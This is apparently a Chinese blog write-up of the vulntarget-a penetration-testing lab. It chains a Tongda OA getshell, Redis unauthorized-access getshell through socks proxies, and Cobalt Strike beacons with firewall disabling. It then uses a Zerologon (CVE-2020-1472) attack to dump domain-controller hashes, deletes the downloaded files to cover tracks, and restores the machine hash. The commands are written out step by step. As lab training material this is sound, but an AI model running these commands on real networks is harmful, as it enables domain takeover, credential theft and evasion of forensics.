vulntarget-a靶场复现

目录

1、web渗透win7 

1、直接访问发现是通达OA系统​编辑

2、使用liqun工具直接getshell​编辑

 3、使用蚁剑直接连接

4、查看靶机信息​编辑

2、通过扫描发现6379端口,在kali中利用redis未授权访问GetShell,拿下win2016靶机

1、使用CobaltStrike工具上线win2016

4、配置蚁剑的代理,连接win2016​编辑

BC-2、利用cobalt strike关闭防火墙并在cobalt strike上上线win2016

3、利用CVE-2020-1472漏洞拿下win2019

1、利用fscan扫描工具通过win2016对win2019进行内网扫描

2、对win2019进行监听​编辑

 3、在kali中利用CVE-2020-1472漏洞,利用impacket得到win2019域控主机的哈希值 

4、通过smp连接,下载sam、security、system并清楚痕迹,将机器的哈希值还原​编辑



1、web渗透win7 

1、直接访问发现是通达OA系统

2、使用liqun工具直接getshell

 3、使用蚁剑直接连接

拿下win7靶机

4、查看靶机信息

2、通过扫描发现6379端口,在kali中利用redis未授权访问GetShell,拿下win2016靶机

1、使用CobaltStrike工具上线win2016

1、修改teamserver配置端口为54321,将CS文件复制到windows10和kali中

先启动kali中CobaltStrike的服务器端 设置密码为kali,端口为54321,并运行。

./teamserver 192.168.119.131 kali

之后启动windows10客户机端,运行Cobalt_Strike_CN.bat文件,配置信息并连接。

 2、在CobaltStrike创建一个监听器,并生成一个后门

 

 3、上传后门并运行

4、扫描上线的主机10.0.20.98,发现10.0.20.99主机。

5、对发现的10.0.20.99主机进行扫描

得到扫描到开放的端口 

6、对win7主机进行代理

 7、在浏览器中设置代理

 

 8、进行目录扫描,发现网站的绝对路径

phpinfo.php

 2、使用代理工具

 

 在被控端运行windows_x86_agent.exe,进行连接

windows_x86_agent.exe -c 192.168.119.129:19999 -s 123

使用0节点,开启socks代理,设置端口号为18888

在浏览器中设置代理将御剑连通被控端的内网

运用一个代理工具来代理本机工具

将御剑使用proxification代理到本机18888端口

 

 使用cobalt strike和御剑端口扫描工具,发现6379端口,可以利用redis来getshell

 

 3、在kali中利用proxychains4代理redis来GetShell-win2016

在kali中打开proxychains4修改配置文件,把已经通过本机在win7开放的代理端口添加进去

kwrite /ect/proxychains4.conf

socks5 192.168.119.129 18888

 

 使用proxychains4代理redis

proxychains4 redis-cli -h 10.0.20.99

用redis获取shell

查看shel.php是否上传成功

4、配置蚁剑的代理,连接win2016

拿下win2016主机10.0.20.99

BC-2、利用cobalt strike关闭防火墙并在cobalt strike上上线win2016

1、通过蚁剑连接上win2016靶机10.0.20.99后查看信息

发现拥有管理员权限,同时还存在一台内网主机

whoami

ipconfig -all

2、利用cobalt strike对10.0.20.99进行监听,监听端口为6666

 

 3、使用cobalt strike连接发现连接不上并且ping不通,怀疑开了防火墙,接下来尝试关闭靶机win2016的防火墙

shell netsh advfirewall set allprofiles state off

 成功上线win2016

connect 10.0.20.99 6666

 此时在cobalt strike上线了靶机win2016

3、利用CVE-2020-1472漏洞拿下win2019

1、利用fscan扫描工具通过win2016对win2019进行内网扫描

先进行域名解析

先通过蚁剑上传fscan内网扫描工具

将扫描出的结果保存在文本中

fscan64.exe -h 10.0.10.110 >1.txt

查看扫描结果发现DC域控制器win2019

接下来利用CVE-2020-1472漏洞拿下win2019

2、对win2019进行监听

通过win7靶机建立对wn2016的监听

use 0 :19999-----> use 1:10001

在本机服务端创建监听1,端口号为10001

在win2016中运行客户端监听器

在本机端口17777端口成功监听到win2016靶机

先在本机中下载依赖安装

pip3 install -r requirements.txt

 提示本机pip版本过低,先将pip升级

python -m pip install --upgrade pip

 通过CVE-2020-1472_poc验证,发现win2019为DC域控端

python3 zerologon_tester.py WIN201910.0.10.110

 

 

 3、在kali中利用CVE-2020-1472漏洞,利用impacket得到win2019域控主机的哈希值 

在kali中下载impacket依赖安装

python3 -m pip install impacket

python3 -m pip install .

 

 利用impacket得到win2019的哈希值

proxychains4 python3 secretsdump.py VULNTARGET/WIN2019\$@10.0.10.110 -no-pass

 

4、通过smp连接,下载sam、security、system并清楚痕迹,将机器的哈希值还原

 查看当前路径下的文件,下载sam、security、system文件

 

 

 

 

 清除三个文件的下载记录

del /f sam.save

del /f security.save

del /f system.save

 利用ntm哈希值还原机器账户的哈希值

python3 secretsdumo.py -sam sam.save -system system.save -security security.save LOCAL

   e784e73f9ce07e98f2894b59c2efa422

 还原哈希值

python3 reinstall_original_ow.py WIN2019 10.0.10.110 e784e73f9ce07e98f2894b59c2efa422

 查看是否清理干净

proxychains4 python secretsdump.py -just-dc -no-pass VULNTARGET/WIN2019\$@10.0.10.110

下载地址:

百度云

链接: 百度网盘 请输入提取码 提取码: 2dwq

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值